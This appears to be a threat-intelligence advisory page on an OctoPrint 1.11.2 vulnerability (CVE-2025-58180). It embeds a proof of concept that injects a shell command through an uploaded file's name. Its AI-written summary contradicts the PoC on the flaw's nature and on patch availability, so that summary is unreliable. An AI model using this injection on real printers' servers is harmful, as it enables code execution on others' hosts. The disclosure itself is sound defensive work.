OctoPrint 1.11.2 - File Upload
OctoPrint version 1. 11. 2 contains a file upload vulnerability that can be exploited via its web interface. This flaw potentially allows an attacker to upload malicious files to the OctoPrint server, which is commonly used to manage 3D printers remotely. Exploitation could lead to unauthorized code execution or disruption of 3D printing operations. No known exploits are currently observed in the wild, but proof-of-concept code is available. The vulnerability affects the confidentiality and integrity of the printing environment and may impact availability if exploited to disrupt services. European organizations using OctoPrint for industrial or hobbyist 3D printing should be cautious. Mitigation involves restricting access to the OctoPrint interface, applying any available patches or updates, and monitoring file uploads closely. Countries with significant manufacturing sectors and advanced 3D printing adoption, such as Germany and the Netherlands, are more likely to be impacted.
AI Analysis
Technical Summary
OctoPrint is an open-source web interface widely used for controlling and monitoring 3D printers remotely. Version 1.11.2 has been identified to contain a file upload vulnerability, which is exploitable through its web interface. This vulnerability allows an attacker to upload arbitrary files to the OctoPrint server. Since OctoPrint runs on devices connected to 3D printers, malicious file uploads could lead to unauthorized code execution or manipulation of print jobs, potentially causing physical damage to printers or producing defective prints. The exploit code is publicly available, increasing the risk of exploitation, although no active attacks have been reported yet. The vulnerability primarily affects the integrity and availability of the printing process and could also expose sensitive information if the attacker gains further access. Given OctoPrint’s deployment in both hobbyist and industrial environments, the risk varies depending on the criticality of the printing operations. The lack of official patches or updates linked to this vulnerability requires users to implement compensating controls. The exploit code is provided as text, indicating a proof-of-concept rather than a fully automated exploit script. Overall, this vulnerability represents a moderate threat to environments relying on OctoPrint for 3D printing management.
Potential Impact
For European organizations, the impact of this vulnerability can range from minor disruptions in hobbyist 3D printing setups to significant operational risks in industrial environments where 3D printing is integrated into manufacturing or prototyping workflows. Unauthorized file uploads could lead to the execution of malicious code on the OctoPrint server, potentially compromising the device and the network it resides on. This could result in altered print jobs, causing defective or unsafe products, or denial of service by disrupting printing operations. Confidentiality risks arise if attackers gain access to sensitive design files or network information. The impact is particularly relevant for sectors such as automotive, aerospace, and medical device manufacturing, where 3D printing is increasingly used and where product integrity is critical. Additionally, disruption of printing services could delay production timelines and increase costs. The absence of known exploits in the wild currently reduces immediate risk but does not eliminate the threat, especially as exploit code is publicly available.
Mitigation Recommendations
1. Restrict network access to the OctoPrint interface by implementing firewall rules and VPN access to limit exposure to trusted users only. 2. Monitor and control file uploads rigorously, employing file type restrictions and scanning uploaded files for malware. 3. Regularly back up OctoPrint configurations and print files to enable recovery in case of compromise. 4. Isolate OctoPrint devices on segmented networks to reduce lateral movement opportunities if compromised. 5. Stay informed about official patches or updates from OctoPrint developers and apply them promptly once available. 6. Consider deploying intrusion detection systems to monitor unusual activity on OctoPrint servers. 7. Educate users on the risks of unauthorized access and enforce strong authentication mechanisms where possible. 8. If feasible, upgrade to newer versions of OctoPrint that may have addressed this vulnerability or implement custom security controls to mitigate file upload risks.
Affected Countries
Germany, Netherlands, France, United Kingdom, Italy, Sweden
Indicators of Compromise
- exploit-code: # Exploit Title: OctoPrint 1.11.2 - File Upload # Date: 2025-09-28 # Exploit Author: prabhatverma.addada # Vendor Homepage: https://octoprint.org # Software Link: https://github.com/OctoPrint/OctoPrint # Affected Version(s): <= 1.11.2 # Patched Version(s): 1.11.3 # CVE: CVE-2025-58180 # CVSS (per advisory): 7.5 # Platform: Linux / OctoPrint server # Type: Remote Code Execution (requires authenticated upload / API key or session) # # Short description: # An authenticated attacker with file-upload access can craft a filename containing shell metacharacters (e.g. ';', ${IFS}) which bypasses filename # sanitization and, when interpolated into a configured system event handler command, results in arbitrary command execution on the host. # # Scope & privileges: # - Trigger privileges: Authenticated file-upload (API key or valid session). NO admin/root required to trigger the attack. # - Precondition: A system event handler that executes shell commands using filename/path placeholders must be configured by an administrator. # # Tested on: # - OctoPrint 1.11.2 running via `octoprint serve --port 5000` on Ubuntu 22.04 # # Reproduction / PoC (manual): # # 1) Start OctoPrint 1.11.2: # octoprint serve --port 5000 --debug # Complete initial setup at http://127.0.0.1:5000 and create an admin user. # # 2) Configure a system event handler that runs shell commands with filename placeholders: # Edit ~/.octoprint/config.yaml and add: # # events: # enabled: true # subscriptions: # - event: FileAdded # type: system # debug: true # command: "{path}" # # Restart OctoPrint. # # 3) Create a harmless test gcode: # mkdir -p /tmp/gcode # cat > /tmp/gcode/ok.gcode <<'EOF' # ; minimal gcode # G28 # M105 # EOF # # 4) Obtain API key from Settings -> API and export it: # export API_KEY='<your_api_key_here>' # # 5) Ensure target proof file does not exist: # ls -la /tmp/test123 # # 6) PoC upload (non-destructive proof): # INJECT_NAME='octo;touch${IFS}/tmp/test123;#.gcode' # # curl -sS -X POST -H "X-Api-Key: $API_KEY" \ # -F "file=@/tmp/gcode/ok.gcode;filename=\"${INJECT_NAME}\"" \ # "http://127.0.0.1:5000/api/files/local" # # 7) Verify execution: # ls -la /tmp/test123 # If /tmp/test123 exists, the injected command executed and RCE is demonstrated. # # Explanation: # - OctoPrint accepted the uploaded filename (sanitize_name allowed these characters in default config). # - FileAdded event payload contains the filename/path. # - A system event subscriber executed a shell command with that placeholder via subprocess with shell=True and without placeholder escaping. # - Shell metacharacters in the filename are interpreted by the shell and executed. # # Mitigations / Workarounds: # - Upgrade OctoPrint to 1.11.3 (patched). # - Disable event handlers using filename placeholders (set enabled: false or uncheck in GUI Event Manager). # - Set feature.enforceReallyUniversalFilenames: true in config.yaml and vet existing uploads. # - Do not expose OctoPrint to hostile networks; restrict upload access. # # References: # - GitHub Security Advisory: https://github.com/OctoPrint/OctoPrint/security/advisories/GHSA-49mj-x8jp-qvfc # - PoC repo: https://github.com/prabhatverma47/CVE-2025-58180 # # Notes for triage: # - Exploit requires only authenticated upload privileges to trigger. No admin/root required to perform the attack. # - PoC uses non-destructive `touch /tmp/test123`.
OctoPrint 1.11.2 - File Upload
Description
OctoPrint version 1. 11. 2 contains a file upload vulnerability that can be exploited via its web interface. This flaw potentially allows an attacker to upload malicious files to the OctoPrint server, which is commonly used to manage 3D printers remotely. Exploitation could lead to unauthorized code execution or disruption of 3D printing operations. No known exploits are currently observed in the wild, but proof-of-concept code is available. The vulnerability affects the confidentiality and integrity of the printing environment and may impact availability if exploited to disrupt services. European organizations using OctoPrint for industrial or hobbyist 3D printing should be cautious. Mitigation involves restricting access to the OctoPrint interface, applying any available patches or updates, and monitoring file uploads closely. Countries with significant manufacturing sectors and advanced 3D printing adoption, such as Germany and the Netherlands, are more likely to be impacted.
AI-Powered Analysis
Technical Analysis
OctoPrint is an open-source web interface widely used for controlling and monitoring 3D printers remotely. Version 1.11.2 has been identified to contain a file upload vulnerability, which is exploitable through its web interface. This vulnerability allows an attacker to upload arbitrary files to the OctoPrint server. Since OctoPrint runs on devices connected to 3D printers, malicious file uploads could lead to unauthorized code execution or manipulation of print jobs, potentially causing physical damage to printers or producing defective prints. The exploit code is publicly available, increasing the risk of exploitation, although no active attacks have been reported yet. The vulnerability primarily affects the integrity and availability of the printing process and could also expose sensitive information if the attacker gains further access. Given OctoPrint’s deployment in both hobbyist and industrial environments, the risk varies depending on the criticality of the printing operations. The lack of official patches or updates linked to this vulnerability requires users to implement compensating controls. The exploit code is provided as text, indicating a proof-of-concept rather than a fully automated exploit script. Overall, this vulnerability represents a moderate threat to environments relying on OctoPrint for 3D printing management.
Potential Impact
For European organizations, the impact of this vulnerability can range from minor disruptions in hobbyist 3D printing setups to significant operational risks in industrial environments where 3D printing is integrated into manufacturing or prototyping workflows. Unauthorized file uploads could lead to the execution of malicious code on the OctoPrint server, potentially compromising the device and the network it resides on. This could result in altered print jobs, causing defective or unsafe products, or denial of service by disrupting printing operations. Confidentiality risks arise if attackers gain access to sensitive design files or network information. The impact is particularly relevant for sectors such as automotive, aerospace, and medical device manufacturing, where 3D printing is increasingly used and where product integrity is critical. Additionally, disruption of printing services could delay production timelines and increase costs. The absence of known exploits in the wild currently reduces immediate risk but does not eliminate the threat, especially as exploit code is publicly available.
Mitigation Recommendations
1. Restrict network access to the OctoPrint interface by implementing firewall rules and VPN access to limit exposure to trusted users only. 2. Monitor and control file uploads rigorously, employing file type restrictions and scanning uploaded files for malware. 3. Regularly back up OctoPrint configurations and print files to enable recovery in case of compromise. 4. Isolate OctoPrint devices on segmented networks to reduce lateral movement opportunities if compromised. 5. Stay informed about official patches or updates from OctoPrint developers and apply them promptly once available. 6. Consider deploying intrusion detection systems to monitor unusual activity on OctoPrint servers. 7. Educate users on the risks of unauthorized access and enforce strong authentication mechanisms where possible. 8. If feasible, upgrade to newer versions of OctoPrint that may have addressed this vulnerability or implement custom security controls to mitigate file upload risks.
Affected Countries
Technical Details
- Edb Id
- 52476
- Has Exploit Code
- true
- Code Language
- text
Indicators of Compromise
Exploit Source Code
Exploit code for OctoPrint 1.11.2 - File Upload
# Exploit Title: OctoPrint 1.11.2 - File Upload # Date: 2025-09-28 # Exploit Author: prabhatverma.addada # Vendor Homepage: https://octoprint.org # Software Link: https://github.com/OctoPrint/OctoPrint # Affected Version(s): <= 1.11.2 # Patched Version(s): 1.11.3 # CVE: CVE-2025-58180 # CVSS (per advisory): 7.5 # Platform: Linux / OctoPrint server # Type: Remote Code Execution (requires authenticated upload / API key or session) # # Short description: # An authenticated attacker with file-uploa... (2990 more characters)
Threat ID: 69845ddcf9fa50a62f0fd49c
Added to database: 2/5/2026, 9:07:40 AM
Last enriched: 2/5/2026, 9:08:31 AM
Last updated: 2/5/2026, 10:39:16 PM
Views: 9
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Related Threats
SIEM Rules for detecting exploitation of vulnerabilities in FortiCloud SSO
MediumResearchers Expose Network of 150 Cloned Law Firm Websites in AI-Powered Scam Campaign
MediumItaly Averted Russian-Linked Cyberattacks Targeting Winter Olympics Websites, Foreign Minister Says
MediumChina-Linked Amaranth-Dragon Exploits WinRAR Flaw in Espionage Campaigns
MediumMalicious NGINX Configurations Enable Large-Scale Web Traffic Hijacking Campaign
MediumActions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console in Console -> Billing for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.